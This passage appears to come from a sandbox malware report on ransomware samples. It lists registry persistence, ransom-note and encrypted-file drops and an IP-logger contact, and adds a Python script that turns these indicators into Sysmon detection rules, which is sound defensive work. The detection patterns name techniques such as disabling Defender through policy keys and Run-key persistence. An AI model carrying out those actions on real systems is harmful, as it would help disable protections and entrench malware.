Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CryptoLocker = "C:\\Users\\Admin\\AppData\\Roaming\\{34184A33-0407-212E-3320-09040709E2C2}.exe" C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
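The registry rows in the sections above (Winlogon Shell, the Windows Defender policy keys, EnableLUA, DisableRegistryTools and the Run values) are the report's most reusable indicators. The following Python is an added example, not part of the sandbox report or of any vendor tooling: it parses a handful of those rows as copied from this page, folds the sandbox's \REGISTRY\MACHINE and \REGISTRY\USER\<SID> spellings into the HKLM/HKU form Sysmon uses, and applies the resulting rules to constructed Sysmon Event ID 13 (RegistryEvent SetValue) records. The Sysmon records, the two benign control entries (a OneDrive Run value under Program Files and a Shell value reset to explorer.exe) and the ATT&CK labels are assumptions made for the example; the hash paths, value names and SID are taken from the report.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Indicator cells copied from the report's signature tables (the sandbox quotes the data and doubles its backslashes).
REPORT_ROWS = [
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\Downloads\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe"',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1"',
    r'Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Michael Gillespie = "C:\\ProgramData\\winlogon.exe"',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Tsuchigumo.bat = "C:\\Windows\\system32\\Tsuchigumo.bat"',
]
ROW_RE = re.compile(r'^Set value \((?:str|int)\) (\\REGISTRY\\.+?) = "(.*)"$')
SID_RE = re.compile(r'S-1-5-21-\d+-\d+-\d+-\d+')
USER_WRITABLE = ('\\appdata\\', '\\programdata\\', '\\downloads\\', '\\temp\\', '\\users\\public\\')
SCRIPT_EXT = ('.bat', '.cmd', '.vbs', '.js', '.ps1')

@dataclass(frozen=True)
class RegWrite:
    key: str    # normalized, lower-cased key path without the value name
    name: str   # value name, lower-cased
    data: str   # value data, sandbox's doubled backslashes undone
    image: str  # writing process, empty for report rows

def normalize_key(path: str) -> str:
    """Fold sandbox (\\REGISTRY\\MACHINE, \\REGISTRY\\USER\\<SID>) and Sysmon (HKLM, HKU\\<SID>) spellings together."""
    p = path.replace('\\REGISTRY\\MACHINE', 'HKLM').replace('\\REGISTRY\\USER', 'HKU')
    return SID_RE.sub('<SID>', p).replace('\\WOW6432Node', '').lower()  # 32-bit view is the same policy

def parse_report_row(row: str) -> RegWrite:
    m = ROW_RE.match(row)
    if not m:
        raise ValueError(f'unparsed row: {row!r}')
    key, _, name = m.group(1).rpartition('\\')
    return RegWrite(normalize_key(key), name.lower(), m.group(2).replace('\\\\', '\\'), '')

def from_sysmon(ev: dict) -> RegWrite:
    """Sysmon EID 13 puts key and value name together in TargetObject and renders DWORDs
    as 'DWORD (0x00000001)'; reduce the record to the same shape as a report row."""
    key, _, name = ev['TargetObject'].rpartition('\\')
    data = ev['Details']
    if data.startswith('DWORD (0x') and data.endswith(')'):
        data = str(int(data[9:-1], 16))
    return RegWrite(normalize_key(key), name.lower(), data, ev.get('Image', ''))

def classify(w: RegWrite) -> Optional[str]:
    """Label one registry write with the technique the report's rows exhibit, else None."""
    k, n, d = w.key, w.name, w.data.lower()
    if k.endswith('\\windows nt\\currentversion\\winlogon') and n == 'shell':
        return None if d == 'explorer.exe' else 'T1547.004 Winlogon Shell replaced'
    if '\\policies\\microsoft\\windows defender' in k and n.startswith('disable') and d == '1':
        return 'T1562.001 Defender feature disabled via policy key'
    if k.endswith('\\currentversion\\policies\\system'):
        if n == 'disableregistrytools' and d == '1':
            return 'T1112 Registry editor disabled'
        if n == 'enablelua':  # 0 turns UAC off; 1 is the default, so that write is only a policy touch
            return 'T1548.002 UAC disabled' if d == '0' else 'policy write: EnableLUA left enabled'
    if '\\currentversion\\run' in k and (d.endswith(SCRIPT_EXT) or any(s in d for s in USER_WRITABLE)):
        return 'T1547.001 Run key pointing to script or user-writable path'
    return None

def report_indicators() -> list:
    return [(w.key, w.name, classify(w)) for w in map(parse_report_row, REPORT_ROWS)]

def hunt(events: list) -> list:
    """Apply the same rules to Sysmon EID 13 records; returns (image, key\\name, label) hits."""
    hits = []
    for ev in events:
        if ev.get('EventID') == 13:
            w = from_sysmon(ev)
            label = classify(w)
            if label:
                hits.append((w.image, f'{w.key}\\{w.name}', label))
    return hits

# Constructed Sysmon records: four shaped like the report's activity, then two benign controls.
SID = 'S-1-5-21-780313508-644878201-565826771-1000'
SYSMON_EVENTS = [
    {'EventID': 13, 'Image': r'C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe', 'Details': 'DWORD (0x00000001)',
     'TargetObject': r'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection'},
    {'EventID': 13, 'Image': r'C:\Windows\SysWOW64\reg.exe', 'Details': 'DWORD (0x00000001)',
     'TargetObject': rf'HKU\{SID}\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools'},
    {'EventID': 13, 'Image': r'C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe', 'Details': r'C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe',
     'TargetObject': rf'HKU\{SID}\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe'},
    {'EventID': 13, 'Image': r'C:\Windows\SysWOW64\reg.exe', 'Details': 'DWORD (0x00000001)',
     'TargetObject': r'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA'},
    {'EventID': 13, 'Image': r'C:\Program Files\Microsoft OneDrive\OneDrive.exe', 'Details': r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background',
     'TargetObject': rf'HKU\{SID}\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive'},
    {'EventID': 13, 'Image': r'C:\Windows\regedit.exe', 'Details': 'explorer.exe',
     'TargetObject': r'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell'},
]

if __name__ == '__main__':
    for key, name, label in report_indicators():
        print(f'report  {label or "-":55} {key}\\{name}')
    for image, target, label in hunt(SYSMON_EVENTS):
        print(f'sysmon  {label:55} {target}  <- {image}')
```

Run stand-alone it prints a label for every report row and four hits from the constructed Sysmon records, leaving the OneDrive Run entry and the explorer.exe Shell value unflagged. The EnableLUA rule deliberately separates a write of 0 (UAC off) from the write of 1 seen in this report, which is the distinction the "UAC bypass" signature above does not make.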

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Public\AccountPictures\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File created C:\Windows\assembly\Desktop.ini C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Windows\assembly\Desktop.ini C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
Each drive letter observed 5 times. The process is explorer.exe, so these opens can equally be the shell refreshing its drive list; correlate with the autorun.inf drop below before reading this as removable-media spreading.

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.com N/A N/A
Observed 2 times. iplogger.com is a URL-shortener/IP-logger service: a single hit hands the operator the victim's public IP and user agent. No process is attributed, so the hostname is the only usable network indicator here.

Drops autorun.inf file

Description Indicator Process Target
File created C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\autorun.inf C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\autorun.inf C:\Windows\SysWOW64\cmd.exe N/A
Modification observed 2 times. The file is written by a cmd.exe stage next to the sample in Downloads, where it is inert: AutoRun only honours an autorun.inf at the root of a mounted volume, and current Windows ignores it for removable drives anyway.

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\Tsuchigumo.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\system32\Tsuchigumo.bat C:\Windows\system32\cmd.exe N/A
Writing into System32 needs an elevated token, so the cmd.exe that created this batch file was already running as administrator.

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe N/A
Observed 10 times. NtSetInformationThread with the ThreadHideFromDebugger class stops the calling thread from delivering debug events to an attached debugger, so breakpoints and single-stepping on that thread silently fail; it is a standard anti-analysis measure. The 537a... sample is the only process on this page that uses it.

Drops file in Program Files directory

Note: the e28b... sample opens files under Microsoft Office, Java, Chrome, Internet Explorer, 7-Zip and dotnet for modification and creates Restore-My-Files.txt (a ransom-note filename associated with LockBit 2.0) in each directory it visits; bulk modification plus one note per directory is the encryption run itself, not an installer. The 69811a... sample instead creates wab32.dll-Locked, the encrypted copy of wab32.dll with a "-Locked" suffix appended to the original name.

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp3-ul-phn.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\jopt-simple.md C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdXC2RVL_MAKC2R-ul-oob.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipssve.xml C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\mesa3d.md C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\LICENSE C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\icu_web.md C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_es.properties C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Inset.eftx C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription1-ppd.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial2-ppd.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.shared.Office.x-none.msi.16.x-none.xml C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail3-ul-phn.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPointVL_MAK-ul-phn.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_Retail-ppd.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\bwnumbered.dotx C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File created C:\Program Files (x86)\Common Files\System\wab32.dll-Locked C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\sk-SK\tipresx.dll.mui C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\oledbjvs.inc C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\133.0.6943.60\Locales\ca.pak C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\tzdb.dat C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AuthoredExtensions.16.xml C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\Restore-My-Files.txt C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
